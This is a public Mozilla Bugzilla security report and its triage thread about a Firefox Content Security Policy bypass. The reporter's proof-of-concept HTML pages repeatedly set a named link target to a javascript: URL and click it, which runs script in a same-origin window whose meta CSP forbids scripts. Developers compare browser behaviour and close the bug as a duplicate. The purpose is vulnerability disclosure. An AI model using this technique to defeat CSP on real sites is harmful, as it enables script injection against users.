Closed Bug 1448828 Opened 7 years ago Closed 7 years ago

Firefox CSP Bypass through target

Categories

(Core :: DOM: Security, defect)

Product:
Core
Component:
DOM: Security
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED DUPLICATE of bug 1448827

People

(Reporter: xsseng, Unassigned)

Details

(Keywords: reporter-external)

Attachments

(1 file)

firefox cps bypass target.docx
140.92 KB, application/vnd.openxmlformats-officedocument.wordprocessingml.document
Details
User Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 Steps to reproduce: i't has issue setting when through <meta>. you know , the webpage can runing javascript code through window.opener and target if they Homologous. Actual results: <script> function start() { setInterval(function() { baidu.href="javascript:alert(location.href);"; baidu.click(); }, 5000); } </script> Expected results: CPS bypass
Summary: cps bypass → Firefox CSP Bypass through window.opener
Summary: Firefox CSP Bypass through window.opener → Firefox CSP Bypass through target
FIrefox Security Team: I find a CSP Bypass Today.We Know,CSP can be setiings Two methods。 resopnse: Content-Security-Policy:sc-src 'self' https://apis.google.com webpage: <meta http-equiv="Content-Security-Policy" content="sc-src 'none'"> i't has issue setting when through <meta>. you know , the webpage can runing javascript code through window.opener and target if they Homologous. Firefox CSP Bypass <Undisclosed> I create 2 webpage go.html target.html go.html: <html> <head><meta charset="utf-8"></head> <body> <a href="./target.html" target="baidu" id="baidu" onclick="return start()">click me</a> <script> function start() { setInterval(function() { baidu.href="javascript:alert(location.href);"; baidu.click(); }, 5000); } </script> </body> </html> Target.html <!DOCTYPE html> <html> <head> <title>CSP Test</title> <meta http-equiv="Content-Security-Policy" content="script-src 'none'"> </head> <body> csp bypass </body> </html> POC online:https://test.kolue.com/test/target/go.html
Group: core-security → dom-core-security
Component: Security → DOM: Security
Flags: needinfo?(ckerschb)
This one is interesting. In Chrome the javascript: alert opens in the original window that has no CSP -- completely ignores the target. In Firefox we obey the named target and open the javascript: URL in the other window (if it's same origin!). At that point it's essentially the same as bug 1448827. If the target window is not same-origin we focus it when you click (because of the target) but then silently drop the javascript execution (no error on the web or browser consoles). Which behavior for javascript: links with a target is "correct"? I bet it's not clearly specified.
Flags: needinfo?(annevk)
As it happens this one is, but Chrome has a bug (which I reported a while back and asked them to fix quickly due to compatibility issues, but they haven't): https://bugs.chromium.org/p/chromium/issues/detail?id=749492.
Flags: needinfo?(annevk)
I think so, you can closed this bug id . it's essentially the same as bug 1448827.
I am fine with closing this one as a duplicate of bug 1448827.
Flags: needinfo?(ckerschb)
Status: UNCONFIRMED → RESOLVED
Closed: 7 years ago
Resolution: --- → DUPLICATE
Flags: sec-bounty? → sec-bounty-
cve and bounty?
(In reply to Lin Zhang from comment #7) > cve and bounty? Please don't ask about these in the bugs. You need to email security@mozilla.org for these sorts of questions. This bug is resolved as a duplicate of another bug so no CVE is assigned and it isn't eligible for a bounty. Only unique bugs get either of these.
Group: dom-core-security
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: